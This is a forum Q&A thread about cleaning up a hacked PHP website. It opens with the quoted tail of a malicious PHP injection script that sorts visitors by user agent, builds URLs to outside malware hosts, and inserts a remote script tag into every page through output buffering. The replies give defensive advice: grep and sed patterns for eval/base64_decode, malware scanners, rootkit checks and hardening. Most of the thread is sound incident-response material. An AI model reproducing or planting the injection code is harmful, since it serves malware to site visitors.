$content = update_tds_file_777($tdsfile);
}
$tds = #explode("\n", $content);
$c = #count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (!#is_dir($rz)) {
#mkdir($rz);
if (#is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (!#is_dir($rz)) {
#mkdir($rz);
if (#is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/');
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
$_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php') . $d;
$_SERVER['s_script'] = "nl.php?p=d";
}
setup_globals_777();
if (!function_exists('gml_777')) {
function gml_777()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
return $r_string_777;
}
}
if (!function_exists('gzdecodeit')) {
function gzdecodeit($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
ob_start('mrobh');
}
}
?>
First, shut off your site until you can figure out how he got in and how to fix it. That looks like it's serving malware to your clients.
Next, search through your php files for fgets, fopen, fputs, eval, or system. I recommend notepad++ because of its "Find in Files" feature. Also, make sure that that's the only place your PHP has been modified. Do you have an offline copy to compare against?
To get rid of these malicious PHP you simply needs to remove them. If the file is infected, you need to remove only the part which looks suspicious.
It's always tricky to find these files, because usually there are multiple of them across your web root.
Usually if you see some kind of obfuscations, it's red alert for you.
Most of the malwares are easy to find based on the common functions which they use, this includes:
base64_decode,
lzw_decompress,
eval,
and so on
By using encoding format, they're compacting their size and make them more difficult to decode by non-experienced users.
Here are few grep commands which may find the most common malware PHP code:
grep -R return.*base64_decode .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .
You can run these commands on the server or once you synchronised your website into your local machine (via FTP e.g. ncftpget -R).
Or use scan tools which are specially designed for finding that kind of malicious files, see: PHP security scanners.
For education purposes, please find the following collection of PHP exploit scripts, found when investigating hacked servers available at kenorb/php-exploit-scripts GitHub (influenced by #Mattias original collection). This will give you understanding how these PHP suspicious files look like, so you can learn how to find more of them on your server.
See also:
What does this malicious PHP script do?
Drupal: How to remove malicious scripts from admin pages after being hacked?
My websites / or websites I host were hit several times with similar attacks.
I present what I did to resolve the issue. I don't pretend it's the best / easiest approach but it works and since then I can proactively keep the ball in my field.
solve the issue ASAP
I created a very simple PHP script (it was written when the iron was hot so maybe it's not the most optimized code BUT it solves the problem pretty fast):
http://www.ecommy.com/web-security/clean-php-files-from-eval-infection
make sure you know when something like this hits again. Hackers use all kind of aproaches from SQL injection of one of your external modules you install to brute force your admin panel with dictionary attacks or very well known password patterns like 1qaz... qwerty.... etc...
I present the scripts here:
http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections
the cron entry would be something like:
0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&
I updated the pages so someone can download directly the files.
Hope it will he useful for you as it's for me :)
Ensure any popular web applications like Wordpress or vBulletin are updated. There are many exploits with the old versions that can lead to your server getting compromised and it will probably happen again if they are not updated. No use in proceeding until this is done.
If the files keep getting replaced then there is a rootkit or trojan running in the background. That file cannot replicate itself. You will have to get rid of the rootkit first. Try rkhunter, chkrootkit, and LMD. Compare the output of ps aux to a secured server and check /var/tmp and /tmp for suspicious files. You might have to reinstall the OS.
Ensure all workstations administrating the server are up to date and clean. Do not connect via insecure wireless connections or use plain text authentication like with FTP (use SFTP instead). Only log into control panels with https.
To prevent this from happening again run csf or comparable firewall, daily LMD scans, and stay current with the latest security patches for all applications on the server.
I have the same issue and when I delete that, the code generated automatically.I did these steps and it works fine:
1-Limit SSH access
I see some ssh logins attempt and guess it may be related to this Malicious!
2- Enable SELinux
remember that config SElinux for nignx permission access file
3- Remove eval(base64_decode(...))
remove lines contain eval(base64_decode(...)) from all index.php [from root folders, plugin's folders and ....]
Assuming this is a Linux-based server and you have SSH access, you could run this to remove the offending code:
find . -name "*.php" | xargs sed -i 's#eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;##'
This covers all known base64 implementations, and will work whether the base64 text is surrounded by single or double quotes
EDIT: now works with internal whitespace also

Categories